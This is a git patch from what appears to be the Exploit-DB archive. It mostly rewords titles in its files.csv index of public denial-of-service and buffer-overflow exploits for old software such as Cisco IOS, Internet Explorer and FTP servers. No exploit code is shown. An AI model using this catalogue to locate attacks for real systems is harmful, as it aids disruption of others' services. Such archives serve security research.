From 7de3f31675b63b4985a60ab5acb9d83d29250416 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 21 Oct 2017 05:01:31 +0000 Subject: [PATCH] DB: 2017-10-21 9 new exploits Too many to list! --- files.csv | 4655 +++++++++--------- platforms/android/{remote => dos}/35637.py | 0 platforms/hardware/{remote => dos}/19531.txt | 0 platforms/hardware/webapps/43022.py | 169 + platforms/linux/{remote => dos}/19103.c | 0 platforms/linux/local/21362.c | 2 + platforms/multiple/dos/43020.txt | 38 + platforms/php/webapps/42981.txt | 12 +- platforms/python/webapps/43021.py | 211 + platforms/windows/{remote => dos}/41160.py | 0 platforms/windows/webapps/43018.html | 83 + platforms/windows/webapps/43019.txt | 53 + 12 files changed, 2893 insertions(+), 2330 deletions(-) rename platforms/android/{remote => dos}/35637.py (100%) rename platforms/hardware/{remote => dos}/19531.txt (100%) create mode 100755 platforms/hardware/webapps/43022.py rename platforms/linux/{remote => dos}/19103.c (100%) create mode 100755 platforms/multiple/dos/43020.txt create mode 100755 platforms/python/webapps/43021.py rename platforms/windows/{remote => dos}/41160.py (100%) create mode 100755 platforms/windows/webapps/43018.html create mode 100755 platforms/windows/webapps/43019.txt diff --git a/files.csv b/files.csv index 28307ddac..a35586d8b 100644 --- a/files.csv +++ b/files.csv @@ -9,7 +9,7 @@ id,file,description,date,author,platform,type,port 59,platforms/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service",2003-07-18,l0cK,hardware,dos,0 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service",2003-07-21,"Martin Kluge",hardware,dos,0 61,platforms/windows/dos/61.c,"Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,windows,dos,0 -62,platforms/hardware/dos/62.sh,"Cisco IOS - (using hping) Remote Denial of Service",2003-07-22,zerash,hardware,dos,0 +62,platforms/hardware/dos/62.sh,"Cisco IOS - using hping Remote Denial of Service",2003-07-22,zerash,hardware,dos,0 65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Remote Denial of Service (MS03-031)",2003-07-25,refdom,windows,dos,0 68,platforms/linux/dos/68.c,"Linux Kernel 2.4.20 - 'decode_fh' Denial of Service",2003-07-29,"Jared Stanbrough",linux,dos,0 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service",2003-08-01,l0bstah,windows,dos,0 @@ -69,7 +69,7 @@ id,file,description,date,author,platform,type,port 423,platforms/windows/dos/423.pl,"Easy File Sharing Web Server 1.25 - Denial of Service",2004-08-27,"GulfTech Security",windows,dos,0 427,platforms/windows/dos/427.c,"WFTPD Pro Server 3.21 - MLST Remote Denial of Service",2004-08-31,lion,windows,dos,0 428,platforms/windows/dos/428.c,"CesarFTP Server - Long Command Denial of Service",2004-08-31,lion,windows,dos,0 -429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - (Server/Client) Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos,0 +429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - 'Server/Client' Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos,0 433,platforms/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service",2004-09-05,"Luigi Auriemma",multiple,dos,0 463,platforms/windows/dos/463.c,"RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0 468,platforms/windows/dos/468.c,"Pigeon Server 3.02.0143 - Denial of Service",2004-09-19,"Luigi Auriemma",windows,dos,0 @@ -101,7 +101,7 @@ id,file,description,date,author,platform,type,port 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service",2004-11-28,Xtiger,windows,dos,0 664,platforms/windows/dos/664.c,"Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow",2004-11-29,NoPh0BiA,windows,dos,0 665,platforms/windows/dos/665.c,"Orbz Game 2.10 - Remote Buffer Overflow",2004-11-29,"Luigi Auriemma",windows,dos,0 -667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0 +667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - 'http/pna' Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0 671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0 677,platforms/windows/dos/677.txt,"GetRight 5.2a - '.grs' Skin File Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0 @@ -237,19 +237,19 @@ id,file,description,date,author,platform,type,port 1256,platforms/multiple/dos/1256.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 1257,platforms/multiple/dos/1257.html,"Mozilla Firefox 1.0.7 (Mozilla 1.7.12) - Denial of Service",2005-10-17,Kubbo,multiple,dos,0 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 < 0.10.12 SLIMP3 - Remote Buffer Overflow (PoC)",2005-10-20,Sowhat,windows,dos,0 -1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - (Register Users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 +1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - Register Users Denial of Service",2005-10-21,DarkFig,multiple,dos,0 1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)",2005-10-21,anonymous,windows,dos,0 1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - GET Remote Denial of Service",2005-10-27,Expanders,hardware,dos,0 1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6 - 'mshtmled.dll' Denial of Service",2005-10-28,"Tom Ferris",windows,dos,0 1281,platforms/windows/dos/1281.c,"Battle Carry .005 Socket Termination - Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 -1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 < 1.21 - (Server/Client) Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 +1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 < 1.21 - 'Server/Client' Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 1283,platforms/windows/dos/1283.c,"FlatFrag 0.3 - Buffer Overflow / Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 1284,platforms/windows/dos/1284.c,"Glider collectn kill 1.0.0.0 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1285,platforms/windows/dos/1285.c,"Scorched 3D 39.1 - Multiple Vulnerabilities (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1287,platforms/windows/dos/1287.c,"GO-Global Windows Server 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 -1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - (imapd) Remote Buffer Overflow (PoC)",2005-11-16,"Luca Ercoli",windows,dos,0 +1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow (PoC)",2005-11-16,"Luca Ercoli",windows,dos,0 1328,platforms/windows/dos/1328.c,"Microsoft Windows Server 2000 - UPNP (getdevicelist) Memory Leak Denial of Service",2005-11-16,"Winny Thomas",windows,dos,0 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - 'action' Denial of Service",2005-11-18,BassReFLeX,multiple,dos,0 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",windows,dos,0 @@ -267,41 +267,41 @@ id,file,description,date,author,platform,type,port 1376,platforms/windows/dos/1376.c,"Microsoft IIS - HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0 1377,platforms/windows/dos/1377.pl,"Microsoft IIS - HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0 -1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0 +1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - undelimited string Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0 1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos,0 -1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 +1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - 'NLST' Denial of Service",2006-01-14,pi3ch,windows,dos,0 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0 -1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 +1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - IMG / XML elements Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - GET Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service)",2006-01-25,Pasv,hardware,dos,0 -1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (TelnetD) Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos,0 -1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - (Reset Display) Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos,0 +1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - 'TelnetD' Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos,0 +1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - Reset Display Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - 'urlmon.dll' Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service",2006-02-11,Firestorm,multiple,dos,0 1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos,0 -1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0 +1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - Register Users Denial of Service",2006-02-10,SkOd,multiple,dos,0 1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point - Fragmented UDP Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0 1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 -1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0 +1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - Register Multiple Users Denial of Service",2006-02-20,K4P0,php,dos,0 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0 -1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0 +1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - 'oldsocketmode' Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)",2006-02-28,"Evgeny Legerov",bsd,dos,0 1551,platforms/hardware/dos/1551.txt,"Multiple Routers - 'IRC Request' Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0 -1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - (Jumbo Malloc) Crash (Denial of Service)",2006-03-06,"Luigi Auriemma",windows,dos,0 +1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - Jumbo Malloc Crash (Denial of Service)",2006-03-06,"Luigi Auriemma",windows,dos,0 1558,platforms/windows/dos/1558.c,"LieroX 0.62b - Remote Server/Client Denial of Service",2006-03-06,"Luigi Auriemma",windows,dos,0 1559,platforms/windows/dos/1559.c,"Sauerbraten 2006_02_28 - Multiple Buffer Overflow/Crash Vulnerabilities",2006-03-06,"Luigi Auriemma",windows,dos,0 1560,platforms/windows/dos/1560.c,"Cube 2005_08_29 - Multiple Buffer Overflow/Crash Vulnerabilities",2006-03-06,"Luigi Auriemma",windows,dos,0 1564,platforms/windows/dos/1564.c,"Alien Arena 2006 Gold Edition 5.00 - Multiple Vulnerabilities",2006-03-07,"Luigi Auriemma",windows,dos,0 1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service",2006-03-10,str0ke,multiple,dos,0 -1573,platforms/php/dos/1573.php,"Guppy 4.5.11 - (Delete Databases) Remote Denial of Service",2006-03-10,trueend5,php,dos,0 -1593,platforms/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - (IMAP) Denial of Service",2006-03-19,Omni,windows,dos,0 +1573,platforms/php/dos/1573.php,"Guppy 4.5.11 - Delete Databases Remote Denial of Service",2006-03-10,trueend5,php,dos,0 +1593,platforms/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - 'IMAP' Denial of Service",2006-03-19,Omni,windows,dos,0 1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - Script Action Handlers 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 1599,platforms/windows/dos/1599.cpp,"Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0 -1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - (COM Components) Remote Crash",2006-03-22,"Debasis Mohanty",windows,dos,0 +1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - COM Components Remote Crash",2006-03-22,"Debasis Mohanty",windows,dos,0 1603,platforms/windows/dos/1603.c,"Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",windows,dos,0 1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0 @@ -317,59 +317,59 @@ id,file,description,date,author,platform,type,port 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - 'sys_timer_create()' Local Denial of Service",2006-04-09,fingerout,linux,dos,0 1667,platforms/multiple/dos/1667.html,"Mozilla Firefox 1.5.0.1 / Camino 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0 1671,platforms/multiple/dos/1671.c,"panic-reloaded - TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0 -1688,platforms/windows/dos/1688.c,"Neon Responder 5.4 - (Clock Synchronization) Denial of Service",2006-04-17,"Stefan Lochbihler",windows,dos,0 -1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - (Version String) Remote Format String (PoC)",2006-04-23,"Luigi Auriemma",windows,dos,0 +1688,platforms/windows/dos/1688.c,"Neon Responder 5.4 - Clock Synchronization Denial of Service",2006-04-17,"Stefan Lochbihler",windows,dos,0 +1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - Version String Remote Format String (PoC)",2006-04-23,"Luigi Auriemma",windows,dos,0 1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0 1712,platforms/osx/dos/1712.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 1715,platforms/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - 'ROWSPAN' Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - 'js320.dll/xpcom_core.dll' Denial of Service (PoC)",2006-04-24,splices,multiple,dos,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer - 'parser.exe' Denial of Service",2006-04-26,sh4d0wman,hardware,dos,0 1721,platforms/windows/dos/1721.pl,"BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow (PoC)",2006-04-27,"Dedi Dwianto",windows,dos,0 -1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow (PoC)",2006-05-03,"Jerome Athias",windows,dos,0 +1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)",2006-05-03,"Jerome Athias",windows,dos,0 1746,platforms/linux/dos/1746.pl,"zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",linux,dos,0 1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0 1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos,0 -1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service",2006-05-05,Bigeazer,windows,dos,0 -1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0 -1758,platforms/windows/dos/1758.pl,"TinyFTPD 1.4 - (USER) Remote Buffer Overflow Denial of Service",2006-05-06,[Oo],windows,dos,0 -1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0 +1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - 'USER' Remote Unauthenticated Denial of Service",2006-05-05,Bigeazer,windows,dos,0 +1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - 'USER' Remote Denial of Service",2006-05-06,Omni,windows,dos,0 +1758,platforms/windows/dos/1758.pl,"TinyFTPD 1.4 - 'USER' Remote Buffer Overflow Denial of Service",2006-05-06,[Oo],windows,dos,0 +1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - CSS Attribute Denial of Service",2006-05-10,seven,windows,dos,0 1781,platforms/windows/dos/1781.txt,"outgun 1.0.3 bot 2 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 -1782,platforms/windows/dos/1782.txt,"Empire 4.3.2 - (strncat) Denial of Service",2006-05-14,"Luigi Auriemma",windows,dos,0 -1783,platforms/windows/dos/1783.txt,"Genecys 0.2 - (Buffer Overflow/NULL pointer) Denial of Service",2006-05-14,"Luigi Auriemma",windows,dos,0 +1782,platforms/windows/dos/1782.txt,"Empire 4.3.2 - 'strncat' Denial of Service",2006-05-14,"Luigi Auriemma",windows,dos,0 +1783,platforms/windows/dos/1783.txt,"Genecys 0.2 - Buffer Overflow/NULL pointer Denial of Service",2006-05-14,"Luigi Auriemma",windows,dos,0 1784,platforms/windows/dos/1784.txt,"raydium svn 309 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 -1792,platforms/windows/dos/1792.txt,"GNUnet 0.7.0d - (Empty UDP Packet) Remote Denial of Service",2006-05-15,"Luigi Auriemma",windows,dos,0 +1792,platforms/windows/dos/1792.txt,"GNUnet 0.7.0d - Empty UDP Packet Remote Denial of Service",2006-05-15,"Luigi Auriemma",windows,dos,0 1801,platforms/multiple/dos/1801.txt,"libextractor 0.5.13 - Multiple Heap Overflows (PoC)",2006-05-17,"Luigi Auriemma",multiple,dos,0 -1802,platforms/multiple/dos/1802.html,"Mozilla Firefox 1.5.0.3 - (Loop) Denial of Service",2006-05-18,"Gianni Amato",multiple,dos,0 -1815,platforms/linux/dos/1815.c,"portmap 5 Beta - (Set/Dump) Local Denial of Service",2006-05-22,"Federico L. Bossi Bonin",linux,dos,0 -1819,platforms/multiple/dos/1819.txt,"PunkBuster < 1.229 - (WebTool Service) Remote Buffer Overflow Denial of Service",2006-05-23,"Luigi Auriemma",multiple,dos,0 -1820,platforms/multiple/dos/1820.txt,"netPanzer 0.8 rev 952 - (frameNum) Server Terminiation Exploit",2006-05-23,"Luigi Auriemma",multiple,dos,0 -1838,platforms/windows/dos/1838.html,"Microsoft Internet Explorer - (HTML Tag) Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",windows,dos,0 -1852,platforms/linux/dos/1852.c,"gxine 0.5.6 - (HTTP Plugin) Remote Buffer Overflow (PoC)",2006-05-30,"Federico L. Bossi Bonin",linux,dos,0 +1802,platforms/multiple/dos/1802.html,"Mozilla Firefox 1.5.0.3 - 'Loop' Denial of Service",2006-05-18,"Gianni Amato",multiple,dos,0 +1815,platforms/linux/dos/1815.c,"portmap 5 Beta - 'Set/Dump' Local Denial of Service",2006-05-22,"Federico L. Bossi Bonin",linux,dos,0 +1819,platforms/multiple/dos/1819.txt,"PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow Denial of Service",2006-05-23,"Luigi Auriemma",multiple,dos,0 +1820,platforms/multiple/dos/1820.txt,"netPanzer 0.8 rev 952 - 'frameNum' Server Terminiation Exploit",2006-05-23,"Luigi Auriemma",multiple,dos,0 +1838,platforms/windows/dos/1838.html,"Microsoft Internet Explorer - HTML Tag Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",windows,dos,0 +1852,platforms/linux/dos/1852.c,"gxine 0.5.6 - HTTP Plugin Remote Buffer Overflow (PoC)",2006-05-30,"Federico L. Bossi Bonin",linux,dos,0 1856,platforms/windows/dos/1856.url,"Microsoft Internet Explorer 6 - 'inetconn.dll' Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos,0 -1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service",2006-06-02,n00b,multiple,dos,0 +1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - 'marquee' Denial of Service",2006-06-02,n00b,multiple,dos,0 1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0 1894,platforms/linux/dos/1894.py,"0verkill 0.16 - ASCII-ART Game Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos,0 1927,platforms/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos,0 1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0 -1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0 +1937,platforms/multiple/dos/1937.html,"Opera 9 - long href Remote Denial of Service",2006-06-21,N9,multiple,dos,0 1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - 'do_hook()' Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0 1967,platforms/windows/dos/1967.c,"Microsoft Windows - TCP/IP Protocol Driver Remote Buffer Overflow",2006-06-30,Preddy,windows,dos,0 -1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0 +1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - 'iframe' Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - 'CG_ServerCommand()' Remote Overflow",2006-07-02,RunningBon,windows,dos,0 1977,platforms/win_x86/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,win_x86,dos,0 1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - POST Denial of Service",2006-07-04,n00b,windows,dos,0 -1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0 +1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - SFX Path Stack Overflow",2006-07-05,posidron,windows,dos,0 1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0 1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 -2000,platforms/hardware/dos/2000.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow (PoC)",2006-07-10,"Michael Thumann",hardware,dos,0 +2000,platforms/hardware/dos/2000.pl,"SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)",2006-07-10,"Michael Thumann",hardware,dos,0 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 - Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0 -2037,platforms/windows/dos/2037.c,"Dumb 0.9.3 - (it_read_envelope) Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",windows,dos,0 -2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 - (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0 +2037,platforms/windows/dos/2037.c,"Dumb 0.9.3 - 'it_read_envelope' Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",windows,dos,0 +2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 - 'Content-Type' Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0 2051,platforms/linux/dos/2051.py,"Sendmail 8.13.5 - Remote Signal Handling (PoC)",2006-07-21,redsand,linux,dos,0 2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,windows,dos,0 2059,platforms/hardware/dos/2059.cpp,"D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 -2073,platforms/multiple/dos/2073.c,"libmikmod 3.2.2 - (GT2 loader) Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",multiple,dos,0 +2073,platforms/multiple/dos/2073.c,"libmikmod 3.2.2 - GT2 Loader Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",multiple,dos,0 2124,platforms/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos,0 2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0 2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0 @@ -380,19 +380,19 @@ id,file,description,date,author,platform,type,port 2194,platforms/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,windows,dos,0 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,windows,dos,0 -2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Crash (Denial of Service)",2006-08-18,Mr.Niega,windows,dos,0 +2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - IE Plugin Remote Crash (Denial of Service)",2006-08-18,Mr.Niega,windows,dos,0 